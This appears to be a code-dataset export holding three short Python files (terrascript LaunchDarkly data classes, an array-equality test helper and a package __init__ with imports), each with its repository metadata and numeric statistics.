class launchdarkly_feature_flag_environment(terrascript.Data):
pass
class launchdarkly_project(terrascript.Data):
pass
class launchdarkly_segment(terrascript.Data):
pass
class launchdarkly_team_member(terrascript.Data):
pass
class launchdarkly_webhook(terrascript.Data):
pass
| 16.973684 | 79 | 0.786047 | 71 | 645 | 6.985915 | 0.450704 | 0.239919 | 0.268145 | 0.290323 | 0.524194 | 0.306452 | 0.189516 | 0 | 0 | 0 | 0 | 0.001805 | 0.141085 | 645 | 37 | 80 | 17.432432 | 0.893502 | 0.11938 | 0 | 0.368421 | 1 | 0 | 0.069027 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.368421 | 0.105263 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
25c3d479ba49eb53faf69b4f48a843474819a047 | 207 | py | Python | tests/_test_utils.py | Pietroobbiso/Forecasting-intermittent-demand-a-comparative-approach | bb2336caf61a050b6ebfae559f895be92a33b0eb | [
"Apache-2.0"
] | null | null | null | tests/_test_utils.py | Pietroobbiso/Forecasting-intermittent-demand-a-comparative-approach | bb2336caf61a050b6ebfae559f895be92a33b0eb | [
"Apache-2.0"
] | null | null | null | tests/_test_utils.py | Pietroobbiso/Forecasting-intermittent-demand-a-comparative-approach | bb2336caf61a050b6ebfae559f895be92a33b0eb | [
"Apache-2.0"
] | null | null | null | from typing import Union
import numpy as np
def equal_arrays(
arr_a: Union[np.ndarray, list], arr_b: Union[np.ndarray, list]
) -> bool:
return all([a == b for a, b in zip(arr_a, arr_b)])
| 20.7 | 67 | 0.637681 | 37 | 207 | 3.432432 | 0.567568 | 0.062992 | 0.220472 | 0.283465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.236715 | 207 | 9 | 68 | 23 | 0.803797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0.166667 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
25ff057a387018e7335720e2dd7e725bb697102b | 40 | py | Python | mangadex/http/result/__init__.py | mansuf/mangadex.py | 42d6278f4383c99fb64add179dff3df3e82b2baa | [
"MIT"
] | null | null | null | mangadex/http/result/__init__.py | mansuf/mangadex.py | 42d6278f4383c99fb64add179dff3df3e82b2baa | [
"MIT"
] | null | null | null | mangadex/http/result/__init__.py | mansuf/mangadex.py | 42d6278f4383c99fb64add179dff3df3e82b2baa | [
"MIT"
] | null | null | null | from .auth import *
from .manga import * | 20 | 20 | 0.725 | 6 | 40 | 4.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175 | 40 | 2 | 20 | 20 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.